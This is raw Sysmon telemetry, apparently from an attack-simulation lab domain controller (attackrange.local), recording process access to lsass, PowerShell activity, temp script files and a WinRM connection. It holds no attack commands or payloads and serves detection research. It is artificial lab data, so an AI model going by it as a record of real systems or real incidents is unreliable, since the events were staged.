12:00:00.247{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.247{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.060{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.060{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.060{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.029{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.029{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.029{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x8000000000000000479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.997{266CAFBE-643E-6064-D002-00000000AD01}3320ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.982{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-6441-6064-E002-00000000AD01}4648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.982{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-6441-6064-E002-00000000AD01}4648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x8000000000000000688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.175{266CAFBE-62C7-6064-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse46.128.24.6446.128.24.64.dynamic.cablesurf.de53835-false10.0.1.14win-dc-892.attackrange.local5986- 17141700x8000000000000000687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:01.966{266CAFBE-6441-6064-E002-00000000AD01}4648\PSHost.132616656019009682.4648.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.951{266CAFBE-6441-6064-E002-00000000AD01}4648ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_o313xlvx.f4v.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.951{266CAFBE-6441-6064-E002-00000000AD01}4648ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qz2awmkh.m1b.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.935{266CAFBE-6441-6064-E002-00000000AD01}4648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qz2awmkh.m1b.ps12021-03-31 12:00:01.935 10341000x8000000000000000683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.920{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6441-6064-E002-00000000AD01}4648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.904{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.904{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.904{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-6441-6064-DE02-00000000AD01}27844880C:\Windows\system32\conhost.exe{266CAFBE-6441-6064-E002-00000000AD01}4648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
